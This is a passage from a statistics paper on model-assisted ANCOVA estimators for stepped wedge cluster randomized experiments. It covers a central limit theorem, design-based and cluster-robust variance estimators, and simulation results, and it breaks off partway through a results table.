as \[\overline{Y}_{j}(1) =\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}w_{j}\overline{ Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}w_{j}}=\frac{\sum_{a\in \mathcal{A}}\mathbb{I}\{a\leq j\}\overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}} \mathbb{I}\{a\leq j\}},\] \[\overline{Y}_{j}(0) =\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}w_{j}\overline{Y}_{j }^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}w_{j}}=\frac{\sum_{a\in\mathcal{A}} \mathbb{I}\{a>j\}\overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}}.\] Note that, because of Assumption 2, re-expressions of \(\overline{Y}_{j}(1)\) and \(\overline{Y}_{j}(0)\) in terms of \(\overline{Y}_{j}^{a}\) are not unique, and in fact, one can choose any reasonable weights, i.e., positive and finite, \(\varphi_{a}\), such that \[\overline{Y}_{j}(1)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}\varphi_{a }\overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}\varphi_{a}}, \text{ \ and \ }\overline{Y}_{j}(0)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\varphi_{a} \overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\varphi_{a}}.\] Define \(e_{a}=I_{a}/I\) as the proportion of clusters randomized to treatment adoption time \(a\). Under the same asymptotic regime, we require \(e_{a}>0\) and remains fixed as \(I\to\infty\) for all \(a\). We thus choose \(\varphi_{a}=I_{a}\) which will be useful in further derivations of the CLT results for \(\widehat{\tau}^{w}\). Thus, with the re-expressions above, we can reformulate \(\tau^{w}\) as a linear combination of \(\widetilde{Y}^{a}_{j}\)'s, i.e., \[\tau^{w}=\sum_{j=1}^{J}\sum_{a\in\mathcal{A}}B^{a}_{j}\overline{Y}^{a}_{j}, \tag{9}\] where \[B^{a}_{j}=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{I}\{a\leq j\}I _{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}}-\frac{\mathbb{I}\{a>j \}I_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a}}\right\}.\] Similarly, the estimator, \(\widehat{\tau}^{w}\), can also be re-expressed in terms of random components under the multiple-arm perspective. Analogous to the definition of \(\overline{Y}^{a}_{ij}\) and \(\overline{Y}^{a}_{j}\), we define \(\overline{U}^{a}_{j}=\sum_{i=1}^{I}w_{ij}\overline{U}^{a}_{ij}/\sum_{i=1}^{I }w_{ij}\), where 1. for ANCOVA I, \(\overline{U}^{a}_{ij}=\overline{Y}^{a}_{ij}-\widetilde{\mathbf{X}}_{ij}\widehat {\mathbf{\gamma}}\); 2. for ANCOVA II, \(\overline{U}^{a}_{ij}=\overline{Y}^{a}_{ij}-\widetilde{\mathbf{X}}_{ij}\widehat {\mathbf{\gamma}}_{j}\); 3. for ANCOVA III, \(\overline{U}^{a}_{ij}=\overline{Y}^{a}_{ij}-\widetilde{\mathbf{X}}_{ij}(\mathbb{I }\{a\leq j\}\widehat{\mathbf{\eta}}^{*}+\mathbb{I}\{a>j\}\widehat{\mathbf{\gamma}})\); 4. for ANCOVA IV, \(\overline{U}^{a}_{ij}=\overline{Y}^{a}_{ij}-\widetilde{\mathbf{X}}_{ij}(\mathbb{I }\{a\leq j\}\widehat{\mathbf{\eta}}^{*}_{j}+\mathbb{I}\{a>j\}\widehat{\mathbf{\gamma} }_{j})\). Writing \(\overline{u}^{a}_{j}=\sum_{i=1}^{I}w_{ij}G_{ia}\overline{U}^{a}_{ij}/\sum_{i=1 }^{I}w_{ij}G_{ia}\), then we have the following re-expressions for random components: \[\overline{u}_{j}(1)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}\left( \sum_{i=1}^{I}w_{ij}G_{ia}\right)\overline{u}^{a}_{j}}{\sum_{a\in\mathcal{A}} \mathbb{I}\{a\leq j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)},\ \ \overline{u}_{j}(0)=\frac{\sum_{a\in \mathcal{A}}\mathbb{I}\{a>j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)\overline{ u}^{a}_{j}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia} \right)}.\] Hence \(\widehat{\tau}^{w}\) can be re-expressed as \[\widehat{\tau}^{w}=\sum_{j=1}^{J}\sum_{a\in\mathcal{A}}b^{a}_{j}\overline{u} ^{a}_{j}, \tag{10}\] where \[b^{a}_{j}=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{I}\{a\leq j\} \left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)}{\sum_{a}\mathbb{I}\{a\leq j\}\left( \sum_{i=1}^{I}w_{ij}G_{ia}\right)}-\frac{\mathbb{I}\{a>j\}\left(\sum_{i=1}^{I} w_{ij}G_{ia}\right)}{\sum_{a}\mathbb{I}\{a>j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia} \right)}\right\}.\] We proceed to first define intermediate quantities, \(\widetilde{U}^{a}_{ij}\), which assume that estimates of associated parameter vectors, \(\widehat{\mathbf{\gamma}}\), \(\widehat{\mathbf{\gamma}}_{j}\), \(\widehat{\mathbf{\eta}}^{*}\), and \(\widehat{\mathbf{\eta}}^{*}_{j}\), are substituted by their corresponding known values, \(\mathbf{\gamma}\), \(\mathbf{\gamma}_{j}\), \(\mathbf{\eta}^{*}\), and \(\mathbf{\eta}^{*}_{j}\), which are weighted least squares coefficient vectors that would be obtained if the full set of potential outcomes are available, and then vectors of period-level random components, \(\overline{\mathbf{t}}^{a}=(w\widetilde{u}^{a}_{1},\ldots,w\widetilde{u}^{a}_{J}, \overline{w}^{a}_{1},\ldots,\overline{w}^{a}_{J})^{\prime}\), where \(w\widetilde{u}^{a}_{j}=I^{a-1}_{i}\sum_{i=1}^{I}G_{ia}w_{ij}\widetilde{U}^{a}_{ij}\) and \(\overline{w}^{a}_{j}=I^{a-1}_{i}\sum_{i=1}^{I}w_{ij}G_{ia}\), and vectors of period-level average components, \(\overline{\mathbf{T}}^{a}=(w\widetilde{U}^{a}_{1},\ldots,w\widetilde{U}^{a}_{J}, \overline{w}_{1},\ldots,\overline{w}_{J})^{\prime}\), where \(w\widetilde{U}^{a}_{j}=I^{-1}\sum_{i=1}^{I}w_{ij}\widetilde{U}^{a}_{ij}\) and \(\overline{w}_{j}=I^{-1}\sum_{i=1}^{I}w_{ij}\), with cluster-level vectors, \(\overline{\mathbf{T}}^{a}=(w_{i1}\widetilde{U}^{a}_{1},\ldots,w_{ij}\widetilde{U}^{a }_{J},w_{i1},\ldots,w_{ij})^{\prime}\) such that \(\overline{\mathbf{T}}^{a}=I^{-1}\sum_{i=1}^{I}w_{ij}\overline{\mathbf{T}}^{a}_{i}\). Also, we define covariance matrices, \(\mathbf{S}^{a}_{1}=(I-1)^{-1}\sum_{i=1}^{I}(\overline{\mathbf{T}}^{a}_{i}-\overline{ \mathbf{T}}^{a})(\overline{\mathbf{T}}^{a}_{i}-\overline{\mathbf{T}}^{a})^{\prime}\), as well as cross-product matrices, \(\mathbf{S}^{a,a^{\prime}}_{T}=(I-1)^{-1}\sum_{i=1}^{I}(\overline{\mathbf{T}}^{a}_{i}- \overline{\mathbf{T}}^{a})(\overline{\mathbf{T}}^{a^{\prime}}_{i}-\overline{\mathbf{T}}^{a} )^{\prime}\). Similar to \(\widetilde{U}^{a}_{ij}\), we define intermediate quantities \(\widetilde{U}_{ij}(z)\) by replacing estimates of associated parameter vectors with corresponding know values. From the re-expression of \(\widehat{\tau}^{w}\) in (10), we can obtain cluster-level intermediate vectors \[\widetilde{\mathbf{U}}^{a}_{i}=\left(\widetilde{\mathbf{U}}_{i}(1)-\widetilde{\mathbf{U}}(1) \right)\left(\otimes_{j=1}^{J}\mathbb{I}\{a\leq j\}\right)+\left(\widetilde{\mathbf{U} }_{i}(0)-\widetilde{\mathbf{U}}(0)\right)\left(\otimes_{j=1}^{J}\mathbb{I}\{a>j\} \right),\] where \(\widetilde{\mathbf{U}}^{a}_{i}=(\widetilde{U}^{a}_{1},\ldots,\widetilde{U}^{a}_{IJ})^ {\prime}\), \(\widetilde{\mathbf{U}}_{i}(z)=(\widetilde{U}_{i1}(z),\ldots,\widetilde{U}_{IJ}(z))^ {\prime}\), and \(\widetilde{\mathbf{U}}(z)=(\widetilde{U}_{1}(z),\ldots,\widetilde{U}_{J}(z))^{\prime}\) with \(\widetilde{U}_{j}(z)=\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}(z)/\sum_{i=1}^{I}w _{ij}\); \(\otimes\)' is the block diagonal operator, and therefore \(\otimes_{j=1}^{J}\mathbb{I}\{a\leq j\}\) and \(\otimes_{j=1}^{J}\mathbb{I}\{a>j\}\) \(j\) are \(J\times J\)-dimensional diagonal matrices, with the \(j\)-th diagonal element being \(\mathbb{I}\{a\leq j\}\) and \(\mathbb{I}\{a>j\}\), respectively. In addition, we have \(J\times J\)-dimensional cluster-level adjusted diagonal weight matrices \[\widetilde{\mathbf{W}}_{i}^{a}=\otimes_{j=1}^{J}\left(\frac{I_{a}w_{ij}}{I_{j} \overline{w}_{j}}\mathbb{I}\{a\leq j\}-\frac{I_{a}w_{ij}}{(I-I_{j})\overline{w }_{j}}\mathbb{I}\{a>j\}\right).\] Finally, we have covariance matrices, \(\mathbf{S}_{U,\overline{W}}^{a}=(I-1)^{-1}\sum_{i=1}^{I}\widetilde{\mathbf{U}}_{i}^{a} \widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{U}}_{i}^{a \prime}\), cross-product matrices, \(\mathbf{S}_{\overline{U},\overline{W}}^{a,a^{\prime}}=(I-1)^{-1}\sum_{i=1}^{I} \widetilde{U}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a^{ \prime}}\widetilde{\mathbf{U}}_{i}^{a^{\prime}}\), weighted sample covariance matrices for covariates, \(\mathbf{S}_{\mathbf{X},j}=I^{-1}\sum_{i=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{ i}\widetilde{\mathbf{X}}_{ijk}\), and weighted cross-product vectors for the covariates and potential outcomes, \(\mathbf{S}_{\mathbf{X},Y,j}(z)=I^{-1}\sum_{i=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk }^{i}Y_{ijk}(z)\). Based on these intermediate quantities, we now present the CLT for \(\widehat{\tau}^{w}\), and the proof is provided in Web Appendix B. **Theorem 1**.: _Under Assumptions 1 - 3, and further assuming the following regularity conditions for \(a\in\mathcal{A}\) and \(j\in\{1,\ldots,J\}\):_ 1. _Define_ \(m_{j}^{a}(\widetilde{U})=\max_{1\leq i\leq I}\left\{w_{ij}(\widetilde{U}_{ij}^ {a}-\widetilde{U}_{j}^{a})\right\}^{2}\)_,_ \(v_{j}^{a}(\widetilde{U})=(I-1)^{-1}\sum_{i=1}^{I}\left\{w_{ij}(\widetilde{U}_{ ij}^{a}-\widetilde{U}_{j}^{a})\right\}^{2}\)_, and as_ \(I\to\infty\)_,_ \[\max_{a\in\mathcal{A}}\max_{1\leq j\leq J}\frac{m_{j}^{a}(\widetilde{U})}{I_{a }v_{j}^{a}(\widetilde{U})}\to 0.\] 2. _Define_ \(m_{j}(w)=\max_{1\leq i\leq I}\left(w_{ij}-\overline{w}_{j}\right)^{2}\)_,_ \(v_{j}(w)=(I-1)^{-1}\sum_{i=1}^{I}\left(w_{ij}-\overline{w}_{j}\right)^{2}\)_, and as_ \(I\to\infty\)_,_ \[\max_{a\in\mathcal{A}}\max_{1\leq j\leq J}\frac{m_{j}(w)}{I_{a}v_{j}(w)}\to 0.\] 3. _Define_ \[m_{jl}(\widetilde{\mathbf{X}})=\max_{1\leq i\leq I}\left(\frac{w_{ij}}{\overline{ w}_{j}}[\widetilde{\mathbf{X}}_{ij}]_{l}\right)^{2},\ \ \text{and}\ \ v_{jl}(\widetilde{\mathbf{X}})=\frac{1}{I-1}\sum_{i=1}^{I}\frac{w_{ij}^{2}}{ \overline{w}_{j}^{2}}[\widetilde{\mathbf{X}}_{ij}]_{l}^{2},\] _for_ \(l\in\{1,\ldots,p\}\)_, and as_ \(I\to\infty\)_,_ \[\max_{a\in\mathcal{A}}\max_{1\leq j\leq J}\frac{m_{jl}(\widetilde{\mathbf{X}})}{I _{a}v_{jl}(\widetilde{\mathbf{X}})}\to 0.\] 4. \(\mathbf{S}_{T}^{a}\)_,_ \(\mathbf{S}_{T}^{a,a^{\prime}}\)_,_ \(\mathbf{S}_{\widetilde{U},\overline{W}}^{a}\)_,_ \(\mathbf{S}_{\widetilde{U},\overline{W}}^{a,a^{\prime}}\)_,_ \(\mathbf{S}_{\mathbf{X},Y,j}\)_,_ \(\mathbf{S}_{\mathbf{X},Y,j}(z)\)_, and the correlation matrix of_ \(\overline{\mathbf{t}}^{a}\) _have finite (positive definite) limiting values._ 5. \(\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}(1)\neq 0\) _or_ \(\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}(0)\neq 0\)_, for some_ \(j\)_._ _Then, as \(I\to\infty\), \(\widehat{\tau}^{w}\) is a consistent estimator for \(\tau^{w}\) and_ \[\frac{\widehat{\tau}^{w}-\tau^{w}}{\sqrt{\operatorname{var}(\widehat{\tau}^{w })}}\overset{d}{\to}\mathcal{N}\left(0,1\right),\] _where \(\operatorname{var}(\widehat{\tau}^{w})=\mathbf{\varpi}^{\prime}\mathbf{\Sigma}_{\tau^{ w}}\mathbf{\varpi}\) with_ \[\mathbf{\Sigma}_{\tau^{w}}=\sum_{a\in\mathcal{A}}\frac{1}{I_{a}}\mathbf{S}_{\widetilde{U },\overline{W}}^{a}-\sum_{a,a^{\prime}\in\mathcal{A}}\frac{1}{I}\mathbf{S}_{ \widetilde{U},\overline{W}}^{a,a^{\prime}}, \tag{11}\] _and \(\mathbf{\varpi}=(\varpi_{1},\ldots,\varpi_{J})^{\prime}\), \(\varpi_{j}=w_{j}/\sum_{j=1}^{J}w_{j}\)._ Conditions (i)-(v) are adapted from conditions required by Theorems 1 and 2 in Schochet et al. (2021). Specifically, condition (i) is a Lindeberg-type condition to control the tails, which is required to invoke the finite population CLT in Theorem 4 of Li and Ding (2017). Condition (ii) establishes a weak law of large number results for cluster-period weights, implying that \(\overline{w}_{j}^{a}/\overline{w}_{j}\overset{p}{\to}1\). Together with the assumption that \(e_{a}>0\) and remains fixed, condition (iv) states that the number of clusters with each adoption date \(a\in\mathcal{A}\) grows proportionally, and also ensures the existence of limiting values of covariance matrices of residualized potential outcomes, sampling weights, and covariates. Condition (iii) is integral in proving the above theorem. Specifically, we first introduce intermediate quantities by assuming associated parameter vectors are known, and establish a CLT with known parameters. These known parameters are WLS coefficient vectors that would be obtained if the full set of potential outcomes are available. We then proceed to show that estimates of these vectors converge to the same asymptotic value as known parameters and condition (iii) is utilized to ensure that related terms are asymptotically normal with zero mean, which subsequently leads to the result that \(\widehat{\tau}^{w}\) converges to a standard normal distribution. Importantly, Theorem 1 also applies to the nonparametric estimator without covariate adjustments when associated covariate regression parameter vectors are uniformly set to be zero. **Remark 1**.: Of note, the first term of (11) is a summation of separate covariance matrices of cluster-level average model residuals for different groups characterized by the respective treatment adoption times, and it is the counterpart of the conventional two-arm univariate outcome scenario (Imbens and Rubin, 2015, Chapter 6). The second term can be rearranged as \[\sum_{a,a^{\prime}\in\mathcal{A}}\frac{1}{I}\mathbf{S}_{\widetilde{U},\widetilde{ W}}^{a,a^{\prime}}=\frac{1}{I(I-1)}\sum_{i=1}^{I}\left(\sum_{a\in\mathcal{A}} \widetilde{\mathbf{U}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\right)\left(\sum_{a^{ \prime}\in\mathcal{A}}\widetilde{\mathbf{U}}_{i}^{a^{\prime}}\widetilde{\mathbf{W}}_{ i}^{a^{\prime}}\right)^{\prime},\] which is the covariance matrix of cluster-level average residualized potential outcomes among different treatment adoption time groups. A closer look into diagonal entries of (11) with the above rearrangement reveals some interesting connections between the stepped wedge design and the blocked cluster randomized design in Schochet et al. (2021). Specifically, we first study the weight matrix \(\widetilde{\mathbf{W}}_{i}^{a}\), where if \(a\leq j\), then \(I_{a}/I_{j}\) is the ratio between clusters starting to adopt the treatment to the total number of treated clusters in period \(j\); if \(a>j\), then \(I_{a}/(I-I_{j})\) is the ratio between clusters scheduled to adopt the treatment in period \(a\) to the total number of untreated clusters in period \(j\). In a blocked cluster randomized design with balanced number of clusters in each block, where clusters in different blocks are independently randomized to the treatment or control arms, the number of treatment adoption time can only be now (\(a=0\)) or never (\(a=\infty\)) (\(\mathcal{A}=\{0,\infty\}\)). The immediate consequence is that, \(I_{a}=I_{j}\) when \(a=0\), and, \(I_{a}=I-I_{j}\) when \(a=\infty\). Therefore, the \(j\)-th diagonal entry from the first term of (11) becomes \[\frac{1}{I_{j}}\frac{1}{I-1}\sum_{i=1}^{I}\frac{\overline{w}_{ij}^{2}}{ \overline{w}_{j}^{2}}\left\{\widetilde{U}_{ij}(1)-\widetilde{U}_{j}(1)\right\} ^{2}+\frac{1}{I-I_{j}}\frac{1}{I-1}\sum_{i=1}^{I}\frac{\overline{w}_{ij}^{2}} {\overline{w}_{j}^{2}}\left\{\widetilde{U}_{ij}(0)-\widetilde{U}_{j}(0)\right\} ^{2},\] since \(\widetilde{U}_{ij}^{0}=\widetilde{U}_{ij}(1)\) and \(\widetilde{U}_{ij}^{\infty}=\widetilde{U}_{ij}(0)\). Under the same blocked cluster randomized design, the \(j\)-th diagonal entry of the second term of (11) after the above rearrangement becomes \[\frac{1}{I(I-1)}\sum_{i=1}^{I}\frac{\overline{w}_{ij}^{2}}{\overline{w}_{j}^{2 }}\left[\widetilde{U}_{ij}(1)-\widetilde{U}_{ij}(0)-\left\{\widetilde{U}_{j}(1 )-\widetilde{U}_{j}(0)\right\}\right]^{2},\] which is the variance of the average treatment effect estimator across clusters in block \(j\). Putting the first and second terms together, therefore, we obtain the finite population variance of \(\widehat{\tau}_{j}^{w}\) given in Schochet et al. (2021). ### Variance Estimation The estimation of \(\text{var}(\widehat{\tau}^{w})\) hinges upon the estimation of \(\mathbf{\Sigma}_{\tau^{w}}\), the covariance matrix of \((\widehat{\tau}_{1}^{w},\ldots,\widehat{\tau}_{J}^{w})^{\prime}\), since the normalized weight vector, \(\mathbf{\varpi}\), is known. The second term of \(\mathbf{\Sigma}_{\tau^{w}}\), as previously mentioned, is the variance of the average treatment effect estimators across clusters in period \(j\), which is generally unestimable because each cluster can only be randomized to a specific treatment adoption time in practice. The first term, the summation of separate covariance matrices of cluster-level average model residuals for different treatment adoption time groups, can be estimated via a consistent design-based (DB) plug-in estimator. Specifically, the covariance matrix component for the group with treatment adoption time \(a\), \(\mathbf{S}_{\widetilde{U},\widetilde{W}}^{a}\) can be estimated by \[\widehat{\mathbf{S}}_{U,W}^{a}=\frac{1}{I_{a}-1}\sum_{i:A_{i}=a}\widehat{U}_{i}^{a }\widehat{\mathbf{W}}_{i}^{a}\widehat{\mathbf{W}}_{i}^{a}\widehat{\mathbf{U}}_{i}^{a\, \prime},\] where \(\widehat{\mathbf{U}}_{i}^{a}=(\widehat{U}_{i1}^{a},\ldots,\widehat{U}_{iJ}^{a})^{\prime}\), and \(\widehat{U}_{ij}^{a}=(\overline{U}_{ij}(1)-\overline{u}_{j}(1))(\otimes_{j-1}^{ J}\mathbb{I}\{a\leq j\})+(\overline{U}_{ij}(0)-\overline{u}_{j}(0))\times(\otimes_{j=1}^{J} \mathbb{I}\{a>j\})\). The estimator for the weight matrix is \[\widehat{\mathbf{W}}_{i}^{a}=\otimes_{j=1}^{J}\left(\frac{I_{a}w_{ij}}{I_{J} \overline{w}_{j}^{1}}\mathbb{I}\{a\leq j\}-\frac{I_{a}w_{ij}}{(I-I_{j}) \overline{w}_{j}^{0}}\mathbb{I}\{a>j\}\right),\] where \(\overline{w}_{j}^{1}=I_{j}^{-1}w_{j}^{1}\) and \(\overline{w}_{j}^{0}=(I-I_{j})^{-1}w_{j}^{0}\). The DB estimator for \(\mathrm{var}(\widehat{\tau}^{w})\) thus is \[\widehat{\mathrm{var}}_{DB}(\widehat{\tau}^{w})=\mathbf{\varpi}^{\prime}\left( \sum_{a\in\mathcal{A}}\frac{1}{I_{a}}\widehat{\mathbf{S}}_{U,W}^{a}\right)\mathbf{ \varpi}. \tag{12}\] Note that, since the second term, \[\mathbf{\varpi}^{\prime}\left(\sum_{a,\sigma^{\prime}\in\mathcal{A}}\frac{1}{I} \mathbf{S}_{U,\overline{W}}^{a,\sigma^{\prime}}\right)\mathbf{\varpi}=\frac{1}{I(I-1) }\sum_{i=1}^{I}\left(\mathbf{\varpi}^{\prime}\sum_{a\in\mathcal{A}}\widehat{\mathbf{ U}}_{i}^{a}\widehat{\mathbf{W}}_{i}^{a}\right)^{2}\geq 0,\] and is generally unestimable; for this reason, the DB estimator is expected to be conservative. The variance of \(\widehat{\tau}^{w}\) can also be estimated using the cluster-robust standard errors (CRSE) (Liang and Zeger, 1986; Schochet et al., 2021), which assumes the working independence between clusters, but allows errors within the same cluster to be arbitrarily correlated. Using individual-level data, the CRSE estimator for the covariance matrix of WLS ANCOVA model parameters is: \[\mathbf{E}=(\mathbf{D}^{\prime}\mathbf{W}\mathbf{D})^{-1}\left(\sum_{i=1}^{I}\mathbf{D}_{i}^{ \prime}\mathbf{W}_{i}\widehat{\mathbf{e}}_{i}\widehat{\mathbf{e}}_{i}^{\prime}\mathbf{W}_{i} \mathbf{D}_{i}\right)(\mathbf{D}^{\prime}\mathbf{W}\mathbf{D})^{-1}\,,\] where \(\mathbf{D}\) is the design matrix for all individuals specified according to the ANCOVA model adopted, with each row corresponding to a individual, \(\mathbf{W}\) is the weight matrix containing all individuals, \(\mathbf{D}_{i}\) and \(\mathbf{W}_{i}\) are individual design and weight matrices for individuals in cluster \(i\), and \(\widehat{\mathbf{e}}_{i}\) is the vector of WLS residuals in cluster \(i\). Here, we use ANCOVA I as an example, and the other three models follow similarly. In particular, under ANCOVA I, \(\mathbf{E}\) is a \((2J+p)\times(2J+p)\)-dimensional symmetric matrix, with \[\mathbf{E}=\left(\begin{array}{ccc}\mathbf{E}_{11}&\mathbf{E}_{12}&\mathbf{E}_{13}\\ \mathbf{E}_{21}&\mathbf{E}_{22}&\mathbf{E}_{23}\\ \mathbf{E}_{31}&\mathbf{E}_{32}&\mathbf{E}_{33}\end{array}\right),\] and \(\mathbf{E}_{22}\) is the CRSE estimator for \(\mathbf{\Sigma}_{\tau^{w}}\). Thus, the CRSE estimator for \(\mathrm{var}(\widehat{\tau}^{w})\) is \(\widehat{\mathrm{var}}_{CRSE}(\widehat{\tau}^{w})=\mathbf{\varpi}^{\prime}\mathbf{E}_ {22}\mathbf{\varpi}\). We proceed to compare the DB and CRSE estimators via simulations to inform their applications to stepped wedge cluster randomized experiments. ## 4 Simulation Studies ### Simulation Study I We conduct simulation studies to evaluate the finite-sample operating characteristics of the ANCOVA estimators and compare across different model formulations (ANCOVA I-IV), as well as the unadjusted estimators, where no covariate effects are considered (ANCOVA I with \(\mathbf{\gamma}=\mathbf{0}\)). In simulation study I, we consider a fixed total number of \(J=5\) rollout periods, with one pre-rollout (\(j=0\)) and one post-rollout period (\(j=J+1\)), and three settings featuring different numbers of clusters with \(I\in\{18,30,60,120\}\). In each rollout period, \(I/(J+1)\) previously untreated clusters are randomized to the treatment arm, and the remaining untreated clusters after rollout period \(J\) will be assigned to the treatment arm in the post-rollout period. For \(j\in\{0,1,\ldots,J+1\}\), we simulate \(N_{ij}\sim\mathcal{U}(10,90)+2.5(j+1)^{2}\); \(X_{ij1}\sim Bern(0.5)\) represents an exogenous cluster-period-level summary variable following the Bernoulli distribution with \(\mathbb{P}(X_{ij1}=1)=0.5\), and \(X_{ijk2}\sim i/I+\mathcal{U}(-1,1)\) is an individual-level covariate. The potential outcomes are generated as \[Y_{ijk}(0)=\frac{j+1}{J+2}+X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{2} +c_{i}+e_{ijk},\] \[Y_{ijk}(1)=Y_{ijk}(0)+\frac{2N_{ij}I}{(J+2)^{-1}\sum_{j=0}^{J+1}N_{j}}+0.5X_{ij1}+ \left(X_{ijk2}-\overline{X}_{j2}\right)^{3},\] where \(\overline{X}_{j2}\) is the weighted average of \(X_{ijk2}\) in period \(j\) depending on weights specified for each estimand, \(c_{i}\) is the cluster-specific random effect of cluster \(i\), and \(e_{ijk}\) is the individual-specific error independent from \(c_{i}\) and other components, with \(c_{i}\sim\mathcal{N}(0,\sigma_{c}^{2})\) and \(e_{ijk}\sim\mathcal{N}(0,\sigma_{c}^{2})\). Here, we have \(\sigma_{c}^{2}=0.1\) and \(\sigma_{c}^{2}=0.9\), leading to an intra-cluster correlation (ICC) of \(\sigma_{c}^{2}/(\sigma_{c}^{2}+\sigma_{c}^{2})=0.1\). The generating process of potential outcomes is nonlinear in covariates, as it is designed to examine the model-robustness of proposed estimators. We the fit models (3) - (6) with covariate vector \(\widetilde{\mathbf{X}}_{ijk}\) as the centered versions of \(X_{ij1}\), \(X_{ijk2}\). We further assess the impact of including the cluster-period size \(N_{ij}\) as an additional covariate and discuss those results later. We consider simulating 1,000 stepped wedge cluster-randomized experiments, and evaluate finite-sample properties of proposed estimators by calculating their relative bias (BIAS), root mean square error (RMSE), and empirical coverage percentages of 95% confidence intervals (CIs) using the DB and CRSE estimators. Additionally, we compare the average standard errors (ASEs) from the DB and CRSE approaches with corresponding ESEs of proposed estimators. Simulation results for estimating \(\tau^{ind}\) and \(\tau^{cell}\) are presented in Tables 3 and 4, and results of estimating \(\tau^{period}\) are available in Web Table 1 of Web Appendix C. Due to the informative cluster-period size, the true estimands differ such that \(\tau^{ind}=0.729\), \(\tau^{period}=0.638\), and \(\tau^{cell}=0.525\). For each estimand, as the number of clusters, \(I\), increases, the relative bias and RMSE decrease for all five compared estimators, corroborating the consistency property of proposed approaches (also shown in Web Figure 1). A general observation is that, with a sufficient number of clusters (e.g. \(I=120\)), both the DB and CRSE methods provide standard error estimates generally closer to the ESE. Properties of variance estimation approaches, however, can differ substantially with a relatively limited number of clusters. For the DB approach, we found that it is more conservative for the unadjusted, ANCOVA I and II estimators, and the conservativeness is more pronounced when the number of clusters is relatively small (\(I\in\{18,30\}\)). For ANCOVA III, which includes treatment-by-covariate interactions but without period-specific covariate effects, the DB approach yields ASEs close to ESEs, with coverage percentages of 95% confidence intervals close to the nominal level, regardless of the number of clusters. For ANCOVA IV, which includes period-specific interactions, the DB approach slightly underestimates the variance when \(I\) is relatively small but yields relatively accurate results when \(I\) increases (\(I\in\{60,120\}\)). With a limited number of clusters, the underestimation of the variance from the DB approach for ANCOVA IV is not surprising because the working model includes an increasing number of parameters compared to other candidate estimators. In comparison, for the unadjusted, ANCOVA I and II estimators, the CRSE approach yields ASEs closer to respective ESEs even when \(I\) is relatively small, but it may grow conservative when \(I\) increases. For ANCOVA III and IV, the CRSE approach can underestimate the variance when \(I\) is relatively small, but as \(I\) increases, the yielded ASEs grow to approach respective ESEs. Overall, when the number of clusters is limited, the CRSE approach demonstrates better finite-sample properties for the unadjusted, ANCOVA I and II estimators, while the DB approach demonstrates better finite-sample properties for the ANCOVA III and IV estimators. Under the parallel-arm cluster randomized experiments, Su and Ding (2021) showed theoretically that including the cluster size as an additional covariate can lead to asymptotic efficiency gain. Although we are unable to provide an analogous result for the stepped wedge cluster randomized experiments, we repeat the above simulations by including \(X_{ij3}=N_{ij}\) as an additional covariate to empirically investigate this issue. The results are presented in Web Tables 8-10 of Web Appendix D. When the number of clusters is sufficiently large, we observe that adjusting for \(N_{ij}\) can improve the estimation precision and lead to a smaller ESE for all ANCOVA estimators. However, when only a limited number of clusters are included, adjusting for \(N_{ij}\) an additional covariate results in finite-sample efficiency loss for ANCOVA II and IV estimators. This may be explained by the fact that ANCOVA II and IV would require estimating a much larger number of parameters to accommodate an additional covariate compared to ANCOVA I and III. The performances of the variance estimators are generally similar to our main simulations without including \(N_{ij}\). ### Simulation Study II In simulation study II, we compare performances of model-assisted estimators in terms of their relative efficiency, under a number of different data-generating processes, to further inform choices of working \begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{4-10} \(I\) & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline 18 & UN & -0.022 & 0.159 & 0.180 & 0.213 & 0.174 & 0.955 & 0.913 \\ & AN I & -0.013 & 0.101 & 0.131 & 0.163 & 0.134 & 0.977 & 0.941 \\ & AN II & -0.013 & 0.116 & 0.143 & 0.160 & 0.133 & 0.962 & 0.909 \\ & AN III & -0.010 & 0.097 & 0.129 & 0.133 & 0.110 & 0.942 & 0.892 \\ & AN IV & -0.003 & 0.107 & 0.137 & 0.112 & 0.090 & 0.869 & 0.772 \\ \hline 30 & UN & -0.019 & 0.129 & 0.145 & 0.160 & 0.143 & 0.958 & 0.932 \\ & AN I & -0.009 & 0.083 & 0.108 & 0.124 & 0.112 & 0.973 & 0.950 \\ & AN II & -0.012 & 0.094 & 0.118 & 0.125 & 0.113 & 0.955 & 0.923 \\ & 